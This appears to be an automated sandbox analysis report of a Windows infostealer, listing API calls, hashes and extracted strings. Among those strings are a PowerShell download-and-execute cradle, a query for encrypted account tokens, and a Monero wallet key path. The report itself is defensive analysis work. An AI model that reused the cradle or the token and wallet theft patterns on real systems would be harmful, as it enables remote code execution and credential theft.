                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 7dd8e1aad46adcf93f802b40c801bf3595c9a510896917afc7d12bffa92b0566
                                • Instruction ID: ee958e5fee5be4dec0e7576e7452f46e6ca6b9cf104d9aae9c8d32594da74d03
                                • Opcode Fuzzy Hash: 7dd8e1aad46adcf93f802b40c801bf3595c9a510896917afc7d12bffa92b0566
                                • Instruction Fuzzy Hash: BCB14172950108ABEB14FBA0DD96EEE7338FF54304F444568F506B6092EF346E49DBA2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: a798eef28ea36acac72eb6263fcc36ecbcc78d658a14db500af3b36bfb92d211
                                • Instruction ID: 36d45ec60bf6565c869d677236bdda0ebc08d8ea0ee37e08f34b2b38c0b06608
                                • Opcode Fuzzy Hash: a798eef28ea36acac72eb6263fcc36ecbcc78d658a14db500af3b36bfb92d211
                                • Instruction Fuzzy Hash: 10F05E30904209EFD348DFE2E90972C7BB0FB45703F0801AAE60DA6290D7744B82DB97
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C34FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C34FD1
                                • InternetOpenA.WININET(00C50DDF,00000000,00000000,00000000,00000000), ref: 00C34FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C35011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C35041
                                • InternetCloseHandle.WININET(?), ref: 00C350B9
                                • InternetCloseHandle.WININET(?), ref: 00C350C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 1e2452d0339131d96abd6afde1643f0b014e20080276550cc1982bf6ec5f5be8
                                • Instruction ID: 0f997009530a2482c9f1071041097192e9232bdf0665efb7efae51786b6a312a
                                • Opcode Fuzzy Hash: 1e2452d0339131d96abd6afde1643f0b014e20080276550cc1982bf6ec5f5be8
                                • Instruction Fuzzy Hash: CE31F5B4A40218ABDB24CF54DD85BDCB7B8FB48704F1081E9EA09B7281C7706EC58F99
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                • wsprintfA.USER32 ref: 00C48459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,019FEB38,00000000,000F003F,?,00000400), ref: 00C484EC
                                • lstrlen.KERNEL32(?), ref: 00C48501
                                • RegQueryValueExA.ADVAPI32(00000000,019FE940,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C50B34), ref: 00C48599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C48608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C4861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 3e4c7e5d87ced2a1042668bddd2ac24e4e58ef30c56f4adbf2846f272d1ad2c0
                                • Instruction ID: 9823a43bce2bd91a81506328f1d926e1780fa482bee368e097246b3c40bf866e
                                • Opcode Fuzzy Hash: 3e4c7e5d87ced2a1042668bddd2ac24e4e58ef30c56f4adbf2846f272d1ad2c0
                                • Instruction Fuzzy Hash: B5210A719002189FDB64DB54DC85FE9B3B8FB48700F04C1A8E609A6180DF716AC9CFD5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C476A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C476AB
                                • RegOpenKeyExA.ADVAPI32(80000002,019EBC58,00000000,00020119,00000000), ref: 00C476DD
                                • RegQueryValueExA.ADVAPI32(00000000,019FEB20,00000000,00000000,?,000000FF), ref: 00C476FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C47708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                • Instruction ID: a110b61d471dee19dffd231d9fa031bf373940aae3c8c09fcb47d471dd02277e
                                • Opcode Fuzzy Hash: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                • Instruction Fuzzy Hash: 1B01A7B4A00204BFEB04DBE1DC4DF6D77B8EB84701F144164FA08E7291D77099488B52
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C4773B
                                • RegOpenKeyExA.ADVAPI32(80000002,019EBC58,00000000,00020119,00C476B9), ref: 00C4775B
                                • RegQueryValueExA.ADVAPI32(00C476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C4777A
                                • RegCloseKey.ADVAPI32(00C476B9), ref: 00C47784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                • Instruction ID: 4237b3bcbb2dde81ed98244de9fa2fe89684e6cc0aefac42e7ffb4c64e0123b2
                                • Opcode Fuzzy Hash: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                • Instruction Fuzzy Hash: 280144B5A40308BFE714DBE1DC4AFAEB7B8EB44701F144565FA09A7281D67056448B52
                                APIs
                                • memset.MSVCRT ref: 00C440D5
                                • RegOpenKeyExA.ADVAPI32(80000001,019FDEE0,00000000,00020119,?), ref: 00C440F4
                                • RegQueryValueExA.ADVAPI32(?,019FEBC8,00000000,00000000,00000000,000000FF), ref: 00C44118
                                • RegCloseKey.ADVAPI32(?), ref: 00C44122
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44147
                                • lstrcat.KERNEL32(?,019FEDC0), ref: 00C4415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                • Instruction ID: fe2b4e4b4737d46f42a50610ca16fe18ca494ac8b76d27fe4613d7a4ae8fd9c5
                                • Opcode Fuzzy Hash: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                • Instruction Fuzzy Hash: D24165B6910108AFDB14FBA0DC46FFE737DBBC8300F444558BA1A96181EA755B8C9B92
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                • LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                • Instruction ID: 0863342ab00790bbe079c8ef6947ff40a457b4fbdd3ded9186e4bdda3083aca4
                                • Opcode Fuzzy Hash: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                • Instruction Fuzzy Hash: 3E316D74A00209EFDB14DF95D885BAE77B5FF88300F108258E915A7290C774AA85DFA1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: 74f68d21747ff6d6971bf21fe47a96fc04d0ca57730b402c11e79f6120fb0ff3
                                • Instruction ID: 05e27f5220356611a1ffd869cca9315a894f5a7fc5e64b2bfd8174a6217af497
                                • Opcode Fuzzy Hash: 74f68d21747ff6d6971bf21fe47a96fc04d0ca57730b402c11e79f6120fb0ff3
                                • Instruction Fuzzy Hash: 674106B150179CAEDB218B24CCC4FFBBBE8BF55704F1444E8E99A86192E2719B45DF20
                                APIs
                                • lstrcat.KERNEL32(?,019FEB68), ref: 00C447DB
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44801
                                • lstrcat.KERNEL32(?,?), ref: 00C44820
                                • lstrcat.KERNEL32(?,?), ref: 00C44834
                                • lstrcat.KERNEL32(?,019EA7A8), ref: 00C44847
                                • lstrcat.KERNEL32(?,?), ref: 00C4485B
                                • lstrcat.KERNEL32(?,019FDDC0), ref: 00C4486F
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                  • Part of subcall function 00C44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                  • Part of subcall function 00C44570: RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                  • Part of subcall function 00C44570: wsprintfA.USER32 ref: 00C445A6
                                  • Part of subcall function 00C44570: FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                • Instruction ID: 3f49a63a5bbfa89121954b00da500d256c592ecf47b88042986d5367745f69d9
                                • Opcode Fuzzy Hash: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                • Instruction Fuzzy Hash: 003171B29002086BDB14FBB0DC86EED737CBB58700F444599B319A6081EE7497CDDB92
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C42D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C42CC4
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C42D04
                                • ')", xrefs: 00C42CB3
                                • <, xrefs: 00C42D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                • Instruction ID: c04cc2160377460386b987b843223b78a56b9f87be3c614019101501125faada
                                • Opcode Fuzzy Hash: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                • Instruction Fuzzy Hash: B841DD71C502089AEB14FFA1C892BEDBB74FF14304F504129F416A61D2DF746A8AEF95
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C39F41
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
